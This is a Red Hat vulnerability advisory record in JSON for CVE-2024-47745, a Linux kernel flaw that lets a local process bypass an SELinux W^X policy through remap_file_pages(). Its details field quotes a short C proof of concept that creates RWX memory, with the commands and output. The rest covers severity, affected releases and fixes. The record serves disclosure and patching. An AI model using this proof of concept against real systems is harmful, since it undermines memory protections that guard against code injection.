{
  "threat_severity" : "Moderate",
  "public_date" : "2024-10-21T00:00:00Z",
  "bugzilla" : {
    "description" : "kernel: mm: call the security_mmap_file() LSM hook in remap_file_pages()",
    "id" : "2320248",
    "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2320248"
  },
  "cvss3" : {
    "cvss3_base_score" : "4.7",
    "cvss3_scoring_vector" : "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
    "status" : "verified"
  },
  "cwe" : "CWE-670",
  "details" : [ "In the Linux kernel, the following vulnerability has been resolved:\nmm: call the security_mmap_file() LSM hook in remap_file_pages()\nThe remap_file_pages syscall handler calls do_mmap() directly, which\ndoesn't contain the LSM security check. And if the process has called\npersonality(READ_IMPLIES_EXEC) before and remap_file_pages() is called for\nRW pages, this will actually result in remapping the pages to RWX,\nbypassing a W^X policy enforced by SELinux.\nSo we should check prot by security_mmap_file LSM hook in the\nremap_file_pages syscall handler before do_mmap() is called. Otherwise, it\npotentially permits an attacker to bypass a W^X policy enforced by\nSELinux.\nThe bypass is similar to CVE-2016-10044, which bypass the same thing via\nAIO and can be found in [1].\nThe PoC:\n$ cat > test.c\nint main(void) {\nsize_t pagesz = sysconf(_SC_PAGE_SIZE);\nint mfd = syscall(SYS_memfd_create, \"test\", 0);\nconst char *buf = mmap(NULL, 4 * pagesz, PROT_READ | PROT_WRITE,\nMAP_SHARED, mfd, 0);\nunsigned int old = syscall(SYS_personality, 0xffffffff);\nsyscall(SYS_personality, READ_IMPLIES_EXEC | old);\nsyscall(SYS_remap_file_pages, buf, pagesz, 0, 2, 0);\nsyscall(SYS_personality, old);\n// show the RWX page exists even if W^X policy is enforced\nint fd = open(\"/proc/self/maps\", O_RDONLY);\nunsigned char buf2[1024];\nwhile (1) {\nint ret = read(fd, buf2, 1024);\nif (ret <= 0) break;\nwrite(1, buf2, ret);\n}\nclose(fd);\n}\n$ gcc test.c -o test\n$ ./test | grep rwx\n7f1836c34000-7f1836c35000 rwxs 00002000 00:01 2050 /memfd:test (deleted)\n[PM: subject line tweaks]", "A flaw was found in the remap_file_pages function in mm/mmap.c in the Linux kernel, where it does not properly restrict execute access. This vulnerability allows local users to bypass intended SELinux W^X policy restrictions." ],
  "statement" : "This issue affects the Linux kernel shipping with Red Hat Enterprise Linux 8 and 9.\nThis issue does not affect the Linux kernel packages as shipped with Red Hat Enterprise Linux 7 and before.\nThis flaw breaches confidentiality by allowing the SELinux W^X policy to be bypassed.\nRed Hat has assessed the severity as moderate for the following reasons.\n1. First, while the vulnerability allows a bypass of security enforcement (W^X via SELinux), it must be triggered under a narrow sequence: the process must use the READ_IMPLIES_EXEC personality and then call remap_file_pages() on RW pages. That is not necessarily common in many workloads.\n2. Even if a bypass is possible, it does not necessarily guarantee full root escalation or total system compromise; the benefit depends on what code or memory segments can be manipulated, if at all.",
  "affected_release" : [ {
    "product_name" : "Red Hat Enterprise Linux 9",
    "release_date" : "2025-05-13T00:00:00Z",
    "advisory" : "RHSA-2025:6966",
    "cpe" : "cpe:/a:redhat:enterprise_linux:9",
    "package" : "kernel-0:5.14.0-570.12.1.el9_6"
  }, {
    "product_name" : "Red Hat Enterprise Linux 9",
    "release_date" : "2025-05-13T00:00:00Z",
    "advisory" : "RHSA-2025:6966",
    "cpe" : "cpe:/o:redhat:enterprise_linux:9",
    "package" : "kernel-0:5.14.0-570.12.1.el9_6"
  }, {
    "product_name" : "Red Hat Enterprise Linux 9.2 Extended Update Support",
    "release_date" : "2025-05-15T00:00:00Z",
    "advisory" : "RHSA-2025:7683",
    "cpe" : "cpe:/a:redhat:rhel_eus:9.2",
    "package" : "kernel-0:5.14.0-284.117.1.el9_2"
  }, {
    "product_name" : "Red Hat Enterprise Linux 9.2 Extended Update Support",
    "release_date" : "2025-05-15T00:00:00Z",
    "advisory" : "RHSA-2025:7676",
    "cpe" : "cpe:/a:redhat:rhel_eus:9.2::nfv",
    "package" : "kernel-rt-0:5.14.0-284.117.1.rt14.402.el9_2"
  }, {
    "product_name" : "Red Hat Enterprise Linux 9.4 Extended Update Support",
    "release_date" : "2025-05-06T00:00:00Z",
    "advisory" : "RHSA-2025:4509",
    "cpe" : "cpe:/a:redhat:rhel_eus:9.4",
    "package" : "kernel-0:5.14.0-427.67.1.el9_4"
  } ],
  "package_state" : [ {
    "product_name" : "Red Hat Enterprise Linux 6",
    "fix_state" : "Out of support scope",
    "package_name" : "kernel",
    "cpe" : "cpe:/o:redhat:enterprise_linux:6"
  }, {
    "product_name" : "Red Hat Enterprise Linux 7",
    "fix_state" : "Out of support scope",
    "package_name" : "kernel",
    "cpe" : "cpe:/o:redhat:enterprise_linux:7"
  }, {
    "product_name" : "Red Hat Enterprise Linux 7",
    "fix_state" : "Out of support scope",
    "package_name" : "kernel-rt",
    "cpe" : "cpe:/o:redhat:enterprise_linux:7"
  }, {
    "product_name" : "Red Hat Enterprise Linux 8",
    "fix_state" : "Will not fix",
    "package_name" : "kernel",
    "cpe" : "cpe:/o:redhat:enterprise_linux:8"
  }, {
    "product_name" : "Red Hat Enterprise Linux 8",
    "fix_state" : "Will not fix",
    "package_name" : "kernel-rt",
    "cpe" : "cpe:/o:redhat:enterprise_linux:8"
  }, {
    "product_name" : "Red Hat Enterprise Linux 9",
    "fix_state" : "Will not fix",
    "package_name" : "kernel-rt",
    "cpe" : "cpe:/o:redhat:enterprise_linux:9"
  } ],
  "references" : [ "https://www.cve.org/CVERecord?id=CVE-2024-47745\nhttps://nvd.nist.gov/vuln/detail/CVE-2024-47745\nhttps://lore.kernel.org/linux-cve-announce/2024102111-CVE-2024-47745-42e6@gregkh/T" ],
  "name" : "CVE-2024-47745",
  "mitigation" : {
    "value" : "The issue exists if SELinux W^X policy restrictions are being used.",
    "lang" : "en:us"
  },
  "csaw" : false
}